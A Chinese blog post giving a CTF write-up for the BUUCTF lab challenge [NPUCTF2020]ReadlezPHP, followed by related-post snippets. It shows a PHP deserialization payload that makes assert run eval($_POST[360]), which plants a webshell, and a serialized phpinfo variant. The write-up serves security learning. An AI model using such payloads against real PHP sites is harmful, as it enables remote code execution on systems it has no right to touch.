[NPUCTF2020]ReadlezPHP

最新推荐文章于 2021-12-02 14:01:06 发布
最新推荐文章于 2021-12-02 14:01:06 发布
阅读量141 收藏
点赞数 2
分类专栏: Buuctf刷题篇 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49656607/article/details/120087764
版权

每天一题,记录学习

在这里插入图片描述
首先注意到的就是右键看不了源码,那就直接抓包来看,可恶,注意到有一个隐藏的 <a href="./time.php?source"></a> 标签
在这里插入图片描述
去访问这个./time.php?source 看看,很明显就是一道反序列化的题目
在这里插入图片描述
代码很简单,就是$a$b形成嵌套$b($a) 来执行就行了

注意一下eval和assert的区别

evalassert
二者都可以执行PHP语句。只不过是,eval规范更加严格一些,必须符合PHP代码要求。而assert则没有那么严格,执行PHP表达式即可。

eval 函数把字符串按照 PHP 代码来计算 (执行),该字符串必须是合法的 PHP 代码,且必须以分号结尾
如eval(“echo 1;”)
如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false

assert 函数功能是判断一个表达式是否成立,返回true or false,重点是函数会执行此表达式。如果表达式为函数如assert(“echo(1)”),则会输出1,而如果为assert(“echo 1;”)则不会有输出。

payload

 <?php
class HelloPhp
{
    public $a='eval($_POST[360])';
    public $b='assert';
}
$c = new HelloPhp;
echo serialize($c);

//O:8:"HelloPhp":2:{s:1:"a";s:17:"eval($_POST[360])";s:1:"b";s:6:"assert";}

在这里插入图片描述
这个时候如果你和我一样去用蚁剑去连,会发现啥也没有都是空【无语】
在这里插入图片描述
因为flag 就藏在phpinfo()
在这里插入图片描述

paidx0
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
BUUCTF [NPUCTF2020]芜湖
weixin_53349587的博客
01-09 3028
这道题是一个base64隐写,我们要先提取出所有的base加密值,然后用base隐写提取的函数,把flag提取出来,就得到了flag。 1.提取base值 本来想着用ida动调一下,应该可以提出来,结果值在堆上面,ida动调只能看到一半的base值,一点用也没有,没办法,就用pwn的pwndbg查看堆: 接下来就一直单步s运行下去,一个一个把base值提取出来,得到最终的base值: "55y85YmN6YeN5aSN55qE6aOO5pmvLG==", "5riQ5riQ5qih57OK5L
mysql inner join 和join_mysql中的7种联表join
weixin_39703773的博客
12-01 131
建表在这里呢我们先来建立两张有外键关联的张表。CREATE DATABASE db0206;USE db0206;CREATE TABLE `db0206`.`tbl_dept`( `id` INT(11) NOT NULL AUTO_INCREMENT, `deptName` VARCHAR(30), `locAdd` VARCHAR(40), PRIMARY KEY (`id...
[NPUCTF2020]ReadlezPHP 1[b(a)]
weixin_45577185的博客
10-16 146
f12发现了令一个网页,打开 发现代码,开始审计 __destruct()魔术方法: 属性b包裹住属性a 利用assert()函数 assert 判断一个表达式是否成立 assert()可以将整个字符串参数当作php参数执行。 构造反序列化 由b(a)可以构造b=assert,a=phpinfo ->assert(phpinfo()) 反序列化构造 payload:?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert"
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
[NPUCTF2020]共 模 攻 击
2er0!=O的博客
08-01 987
[NPUCTF2020]共 模 攻 击 附件: hint.py: from gmpy2 import * from Crypto.Util.number import * from secret import hint m = bytes_to_long(hint) p = getPrime(256) c = pow(m, 256, p) print(p) p, q = getPrime(256), getPrime(256) n = p * q e1, e2 = getPrime(32), getP
[NPUCTF2020]EzRSA Writeup
bestkasscn的博客
12-02 551
[NPUCTF2020]EzRSA 题目描述 from gmpy2 import lcm , powmod , invert , gcd , mpz from Crypto.Util.number import getPrime from sympy import nextprime from random import randint p = getPrime(1024) q = getPrime(1024) n = p * q gift = lcm(p - 1 , q - 1) e = 54722 fl
NPUCTF2020]ReadlezPHP
shannidawang的博客
08-10 134
考点:反序列化 查看源码 源码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){ $a = $this-&
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
最新发布
07-16
m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值